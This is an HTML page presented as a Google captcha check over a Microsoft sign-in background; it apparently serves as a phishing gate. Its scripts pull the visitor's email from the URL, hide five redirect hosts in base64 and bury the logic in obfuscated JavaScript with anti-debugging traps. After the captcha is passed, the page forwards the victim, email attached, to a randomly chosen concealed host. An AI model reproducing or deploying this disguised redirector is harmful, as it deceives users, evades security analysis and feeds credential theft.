<html><head><meta charset="utf-8">
           <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex" />
<meta name="otherbot" content="noindex" />
<meta name="noarchive" content="noindex" />
<meta name="nosnippet" content="noindex" />
<meta name="noimageindex" content="noindex" />
<meta name="robots" content="none">
<meta name="googlebot" content="none">
<meta name="googlebot-news" content="none" />
<meta name="otherbot" content="none" />
<meta name="noarchive" content="none" />
<meta name="nosnippet" content="none" />
<meta name="noimageindex" content="none" />
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="googlebot-news" content="nofollow" />
<meta name="otherbot" content="nofollow" />
<meta name="noarchive" content="nofollow" />
<meta name="nosnippet" content="nofollow" />
<meta name="noimageindex" content="nofollow" />
<meta name="robots" content="max-snippet:0">
<meta name="robots" content="unavailable_after: 2020-09-22">
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow"> 
        <meta name="viewport" content="width=device-width, initial-scale=1">

 <div class="wrapper">
    <header>            Captcha Verification
 </header>
                <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">            


<style type="text/css">
  @import url('https://fonts.googleapis.com/css2?family=Noto+Serif:ital@1&family=Poppins:wght@400;500;600&display=swap');
*{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Poppins", sans-serif;
}
::selection{
  color: #fff;
  background: #4db2ec;
}
body{
  display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
                 background : url('https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg');
                background-repeat : no-repeat;
                background-position : ;
                background-size : cover;
/*  background: #4db2ec;
*/}
.wrapper{
  max-width: 485px;
  width: 100%;
  background: rgba(255, 255, 255, 0.5);
  padding: 22px 30px 40px;
  border-radius: 10px;
  box-shadow: 8px 8px 8px rgba(0, 0, 0, 0.05);
}
.wrapper header{
  color: #228b22;
  font-size: 35px;
  font-weight: 450;
  text-align: center;
}
.wrapper .captcha-area{
  display: flex;
  height: 65px;
  margin: 30px 0 20px;
  align-items: center;
  justify-content: space-between;
}
.captcha-area .captcha-img{
  height: 100%;
  width: 345px;
  user-select: none;
  background: #000;
  border-radius: 5px;
  position: relative;
}
.captcha-img img{
  width: 100%;
  height: 100%;
  object-fit: cover;
  border-radius: 5px;
  opacity: 0.95;
}
.captcha-img .captcha{
  position: absolute;
  left: 50%;
  top: 50%;
  width: 100%;
  color: #d4d4d4;
  font-size: 35px;
  text-align: center;
  letter-spacing: 10px;
  transform: translate(-50%, -50%);
  text-shadow: 0px 1px 2px black;
  font-family: 'Noto Serif', serif;
}
.wrapper button{
  outline: none;
  border: none;
  color: #fff;
  cursor: pointer;
  background: #228b22;
  border-radius: 5px;
  transition: all 0.3s ease;
}
.wrapper button:hover{
  background: #228b22;
}
.captcha-area .reload-btn{
  width: 75px;
  height: 100%;
  font-size: 25px;
}
.captcha-area .reload-btn i{
  transition: transform 0.3s ease;
}
.captcha-area .reload-btn:hover i{
  transform: rotate(15deg);
}
.wrapper .input-area{
  height: 60px;
  width: 100%;
  position: relative;
}
.input-area input{
  width: 100%;
  height: 100%;
  outline: none;
  padding-left: 100px;
  font-size: 20px;
  border-radius: 5px;
  border: 1px solid #bfbfbf;
}
.input-area input:is(:focus, :valid){
  padding-left: 100px;
  border: 2px solid #228b22;
}
.input-area input::placeholder{
  color: #bfbfbf;
}
.input-area .check-btn{
  position: absolute;
  right: 7px;
  top: 50%;
  font-size: 17px;
  height: 45px;
  padding: 0 20px;
  opacity: 0;
  pointer-events: none;
  transform: translateY(-50%);
}
.input-area input:valid + .check-btn{
  opacity: 1;
  pointer-events: auto;
}
.wrapper .status-text{
  display: none;
  font-size: 18px;
  text-align: center;
  margin: 20px 0 -5px;
}
@media (max-width: 506px){
  body{
    padding: 0 10px;
  }
  .wrapper{
    padding: 22px 25px 35px;
  }
  .wrapper header{
    font-size: 25px;
  }
  .wrapper .captcha-area{
    height: 60px;
  }
  .captcha-area .captcha{
    font-size: 28px;
    letter-spacing: 5px;
  }
  .captcha-area .reload-btn{
    width: 60px;
    margin-left: 5px;
    font-size: 20px;
  }
  .wrapper .input-area{
    height: 55px;
  }
  .input-area .check-btn{
    height: 40px;
  }
  .wrapper .status-text{
    font-size: 15px;
  }
  .captcha-area .captcha-img{
    width: 250px;
  }
}
</style>


    <div style="text-align : center; color : #3d3d3d">
Please enter the captcha below to continue
            &nbsp;&nbsp; &nbsp;&nbsp;(case-sensitive)                </div>
    <div class="captcha-area">
      <div class="captcha-img">
        <img src="https://codingnepalweb.com/demos/custom-captcha-in-javascript/captcha-bg.png" alt="Captch Background">
        <span class="captcha"></span>
      </div>
      <button class="reload-btn"><i class="fas fa-redo-alt"></i></button>
    </div>
    <form action="#" class="input-area">
      <input type="text" placeholder="Enter above characters" maxlength="6" spellcheck="false" required>
     <button class="check-btn">Check</button>
    </form>
            <br>
                <div style="text-align : center; color : #3d3d3d;">
                    © 2022 Google Captcha
                </div>
    <div class="status-text"></div>
  </div>
  <script>
          var email = window.location.hash.substr(1);
  function RandArray(array){
    var rand = Math.random()*array.length | 0;
    var rValue = array[rand];
    return rValue;
}
var myArray = [
'aHR0cHM6Ly96b25lMDItZWN1NDAzLmItY2RuLm5ldA==',
'aHR0cHM6Ly96b25lMDMtZWN1MzA2LmItY2RuLm5ldA==',
'aHR0cHM6Ly96b25lMDQtZWN1ODA5LmItY2RuLm5ldA==',
'aHR0cHM6Ly96b25lMDUtZWN1NTk4LmItY2RuLm5ldA==',
'aHR0cHM6Ly96b25lczAxLWVjdTQwNC5iLWNkbi5uZXQ=',

 ];
var rValue = RandArray(myArray);
var code = atob(email);


</script> 




  <script type="text/javascript">

  const _0x31cdaa=_0x3a91;(function(_0x347699,_0x59dc2d){const _0x4f87b3={_0x5c713c:0x20b,_0x5a01a9:0x1f8,_0x479264:0x1fb,_0x8da908:0x20d,_0x4f61fe:0x1ee,_0x19257f:0x1f2,_0x4c3f62:0x1f7,_0x4ec783:0x208,_0x477742:0x210};const _0x307075=_0x3a91;const _0x367488=_0x347699();while(!![]){try{const _0x2032d8=-parseInt(_0x307075(_0x4f87b3._0x5c713c))/0x1*(parseInt(_0x307075(_0x4f87b3._0x5a01a9))/0x2)+parseInt(_0x307075(_0x4f87b3._0x479264))/0x3*(parseInt(_0x307075(_0x4f87b3._0x8da908))/0x4)+-parseInt(_0x307075(_0x4f87b3._0x4f61fe))/0x5*(parseInt(_0x307075(_0x4f87b3._0x19257f))/0x6)+-parseInt(_0x307075(_0x4f87b3._0x4c3f62))/0x7+parseInt(_0x307075(_0x4f87b3._0x4ec783))/0x8*(-parseInt(_0x307075(0x20e))/0x9)+parseInt(_0x307075(0x1f3))/0xa*(-parseInt(_0x307075(_0x4f87b3._0x477742))/0xb)+parseInt(_0x307075(0x1e1))/0xc;if(_0x2032d8===_0x59dc2d){break;}else{_0x367488['push'](_0x367488['shift']());}}catch(_0x352116){_0x367488['push'](_0x367488['shift']());}}}(_0x44f0,0xb0dea));const _0x1034bf=document[_0x31cdaa(0x202)](_0x31cdaa(0x1e3)),_0xe153e2=document[_0x31cdaa(0x202)](_0x31cdaa(0x1f5)),_0x2206d3=document[_0x31cdaa(0x202)](_0x31cdaa(0x1e5)),_0x580308=document['querySelector'](_0x31cdaa(0x1ea)),_0x7ccacc=document['querySelector']('.status-text');let _0x32c921=['A','B','C','D','E','F','G','H','J','K','L','M','N','P','Q','R','S','T','U','V','W','X','Y','Z',0x2,0x3,0x4,0x5,0x6,0x7,0x8,0x9];function _0x3a91(_0x59ee2a,_0x6c382f){const _0x4ec402=_0x44f0();_0x3a91=function(_0x50dbab,_0x56b1b5){_0x50dbab=_0x50dbab-0x1e1;let _0x5865eb=_0x4ec402[_0x50dbab];return _0x5865eb;};return _0x3a91(_0x59ee2a,_0x6c382f);}function _0x1c031b(){const _0xe6badd={_0x49cddb:0x200,_0x50c0ec:0x1f1};const _0x362daf={_0x205309:0x20c};const _0xb9a24c=_0x31cdaa;const _0x291b89=(function(){const _0x118bc4={_0x36ed76:0x1f6};let _0x113b6e=!![];return function(_0x5b344f,_0x3d41a3){const _0x190461=_0x113b6e?function(){const _0x1c8903=_0x3a91;if(_0x3d41a3){const _0x6e1aff=_0x3d41a3[_0x1c8903(_0x118bc4._0x36ed76)](_0x5b344f,arguments);_0x3d41a3=null;return _0x6e1aff;}}:function(){};_0x113b6e=![];return _0x190461;};}());const _0x2abbbc=_0x291b89(this,function(){const _0x3cb386=_0x3a91;return _0x2abbbc['toString']()['search']('(((.+)+)+)+$')[_0x3cb386(0x20a)]()[_0x3cb386(_0x362daf._0x205309)](_0x2abbbc)['search']('(((.+)+)+)+$');});_0x2abbbc();const _0x528de6=(function(){let _0x3046b4=!![];return function(_0x12f8f2,_0x528e76){const _0x2f4fdf=_0x3046b4?function(){const _0xcc22ad=_0x3a91;if(_0x528e76){const _0x317cf9=_0x528e76[_0xcc22ad(0x1f6)](_0x12f8f2,arguments);_0x528e76=null;return _0x317cf9;}}:function(){};_0x3046b4=![];return _0x2f4fdf;};}());(function(){_0x528de6(this,function(){const _0x6f0049=_0x3a91;const _0x501494=new RegExp(_0x6f0049(0x1fa));const _0x69a830=new RegExp(_0x6f0049(_0xe6badd._0x49cddb),'i');const _0x3b783c=_0x5c05ad('init');if(!_0x501494['test'](_0x3b783c+_0x6f0049(_0xe6badd._0x50c0ec))||!_0x69a830[_0x6f0049(0x204)](_0x3b783c+'input')){_0x3b783c('0');}else{_0x5c05ad();}})();}());for(let _0x46d2f9=0x0;_0x46d2f9<0x6;_0x46d2f9++){let _0x3e1201=_0x32c921[Math[_0xb9a24c(0x206)](Math['random']()*_0x32c921[_0xb9a24c(0x1eb)])];_0x1034bf[_0xb9a24c(0x1f0)]+='\x20'+_0x3e1201;}}function _0x44f0(){const _0x20e3cc=['querySelector','color','test','gger','floor','value','553616dankRM','click','toString','771mcULNR','constructor','4yyidNR','45CvLegl','while\x20(true)\x20{}','517twwXBe','49482684kSzIEB','none','.captcha','block','.input-area\x20input','display','split','#ff0000','stateObject','.check-btn','length','location','debu','281035bzpusI','string','innerText','chain','42pqWrGu','57110YGjLIZ','addEventListener','.reload-btn','apply','9956254fZexob','2974yNhXcI','action','function\x20*\x5c(\x20*\x5c)','532728ujPToV','style','href','Nice!\x20Redirect\x20Approved.','preventDefault','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','Captcha\x20not\x20matched.\x20Please\x20try\x20again!'];_0x44f0=function(){return _0x20e3cc;};return _0x44f0();}_0x1c031b();_0xe153e2['addEventListener'](_0x31cdaa(0x209),()=>{_0x215ffb();_0x1c031b();});_0x580308[_0x31cdaa(0x1f4)](_0x31cdaa(0x209),_0x5146bb=>{const _0x1cc580={_0x49f26c:0x1e4,_0x5cc015:0x207,_0x140671:0x203,_0xca69ea:0x1e8,_0x1116fa:0x201};const _0x5f3d64={_0x361dd6:0x1ec};const _0x2fa1f9=_0x31cdaa;_0x5146bb[_0x2fa1f9(0x1ff)]();_0x7ccacc[_0x2fa1f9(0x1fc)]['display']=_0x2fa1f9(_0x1cc580._0x49f26c);let _0x5d170c=_0x2206d3[_0x2fa1f9(_0x1cc580._0x5cc015)][_0x2fa1f9(0x1e7)]('')['join']('\x20');if(_0x5d170c==_0x1034bf['innerText']){_0x7ccacc['style'][_0x2fa1f9(_0x1cc580._0x140671)]='#008000';_0x7ccacc[_0x2fa1f9(0x1f0)]=_0x2fa1f9(0x1fe);setTimeout(()=>{const _0x3d81ac=_0x2fa1f9;window[_0x3d81ac(_0x5f3d64._0x361dd6)][_0x3d81ac(0x1fd)]=atob(rValue)+'#'+code;},0x3e8);}else{_0x7ccacc['style'][_0x2fa1f9(_0x1cc580._0x140671)]=_0x2fa1f9(_0x1cc580._0xca69ea);_0x7ccacc[_0x2fa1f9(0x1f0)]=_0x2fa1f9(_0x1cc580._0x1116fa);}});function _0x215ffb(){const _0x184dd6={_0x18a3df:0x207,_0x5cb7f:0x1f0,_0x1f0940:0x1e6};const _0x52fa93=_0x31cdaa;_0x2206d3[_0x52fa93(_0x184dd6._0x18a3df)]='';_0x1034bf[_0x52fa93(_0x184dd6._0x5cb7f)]='';_0x7ccacc[_0x52fa93(0x1fc)][_0x52fa93(_0x184dd6._0x1f0940)]=_0x52fa93(0x1e2);}function _0x5c05ad(_0x48b51c){const _0x35cfac={_0x2181d6:0x1ef,_0xd61df8:0x20c,_0x4635fe:0x20f,_0x3c3da6:0x1eb,_0x459152:0x20c};function _0x3a8b37(_0x5e30c5){const _0x5a50e7=_0x3a91;if(typeof _0x5e30c5===_0x5a50e7(_0x35cfac._0x2181d6)){return function(_0x425f07){}[_0x5a50e7(_0x35cfac._0xd61df8)](_0x5a50e7(_0x35cfac._0x4635fe))[_0x5a50e7(0x1f6)]('counter');}else{if((''+_0x5e30c5/_0x5e30c5)[_0x5a50e7(_0x35cfac._0x3c3da6)]!==0x1||_0x5e30c5%0x14===0x0){(function(){return!![];}[_0x5a50e7(_0x35cfac._0xd61df8)]('debu'+'gger')['call'](_0x5a50e7(0x1f9)));}else{(function(){return![];}[_0x5a50e7(_0x35cfac._0x459152)](_0x5a50e7(0x1ed)+_0x5a50e7(0x205))[_0x5a50e7(0x1f6)](_0x5a50e7(0x1e9)));}}_0x3a8b37(++_0x5e30c5);}try{if(_0x48b51c){return _0x3a8b37;}else{_0x3a8b37(0x0);}}catch(_0x298731){}}
  </script>
